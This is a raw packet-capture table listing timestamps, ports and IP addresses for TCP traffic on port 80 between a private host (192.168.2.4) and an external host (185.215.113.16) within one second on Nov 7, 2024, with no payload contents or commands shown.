Nov 7, 2024 04:12:28.166372061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166376114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166383982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166403055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166408062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166419983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166419029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166430950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166441917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166445971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166457891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166471004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166471958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166481972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166493893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166496992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166503906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166517973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166523933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166529894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166562080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166563988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166574001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166600943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166611910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166615009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166625977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166635036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166656017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166676044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.166930914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166976929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.166987896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167009115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167037010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167051077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167196989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167208910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167218924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167238951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167241096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167258978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167262077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167270899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167282104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167287111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167299032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167306900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167325020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167332888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167336941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167342901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167350054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167361975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167376995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167382002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167401075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167412043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167422056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167432070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167447090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167455912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167459011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167471886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167494059 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167499065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167510986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167517900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167521954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167534113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167541027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167545080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167551994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167556047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167568922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167577028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167586088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167603970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167603970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167604923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167618036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167628050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167640924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167643070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167643070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167665005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167673111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167685032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167690992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167695999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167710066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167725086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167738914 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167778969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167798042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167809963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167820930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167833090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167838097 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167869091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167874098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167890072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.167912960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167924881 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.167979956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168005943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168018103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168040037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168056965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168080091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168092012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168097973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168102980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168109894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168112040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168133974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168189049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168203115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168211937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168221951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168241024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168251038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168257952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168262005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168275118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168281078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168299913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168303967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168312073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168325901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168332100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168350935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168354988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168361902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168373108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168373108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168386936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168397903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168399096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168414116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168423891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168437004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168446064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168447018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168459892 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168459892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168473959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168483019 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168484926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168497086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.168503046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168519020 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.168546915 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201515913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201549053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201560020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201570988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201584101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201585054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201607943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201608896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201628923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201639891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201648951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201652050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201672077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201679945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201697111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201705933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201720953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201721907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201734066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201744080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201750994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201756001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201764107 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201797009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201906919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201917887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201941013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201952934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201960087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.201962948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201976061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.201982975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202002048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202025890 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202035904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202047110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202056885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202075958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202102900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202125072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202136040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202157974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202169895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202176094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202181101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202200890 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202219009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202236891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202245951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202282906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202323914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202378035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202389002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202399015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202420950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202420950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202441931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202466011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202523947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202536106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202545881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202568054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202572107 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202590942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202593088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202605009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202616930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202617884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202630043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202640057 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202663898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202665091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202680111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202682972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202691078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202703953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202722073 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202760935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202783108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202794075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202800989 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202816010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202831984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202835083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202848911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202857971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202860117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202876091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202882051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202892065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202900887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202913046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202918053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202928066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202943087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202951908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202963114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202970028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.202980042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.202996016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203001022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203007936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203016043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203020096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203046083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203047991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203058004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203068018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203068972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203080893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203088999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203113079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203123093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203147888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203169107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203181028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203190088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203191996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203197956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203231096 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203356981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203385115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203397036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203408957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203430891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203486919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203511000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203521013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203526974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203535080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203550100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203562975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203574896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203586102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203594923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203598976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203608990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203630924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203640938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203654051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203671932 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203681946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203692913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203702927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203756094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203764915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203774929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203788042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203830957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203841925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203850985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203855991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203856945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203856945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203856945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203869104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203876019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203886986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203896046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203896999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203896999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203896999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203896999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203915119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203932047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203939915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203950882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203959942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203968048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.203979015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203989983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.203995943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.204000950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204013109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204018116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204029083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.204050064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.204063892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204087973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204098940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.204099894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204107046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.204112053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204124928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204134941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.204135895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.204149008 CET	80	49762	185.215.113.16	192.168.2.4
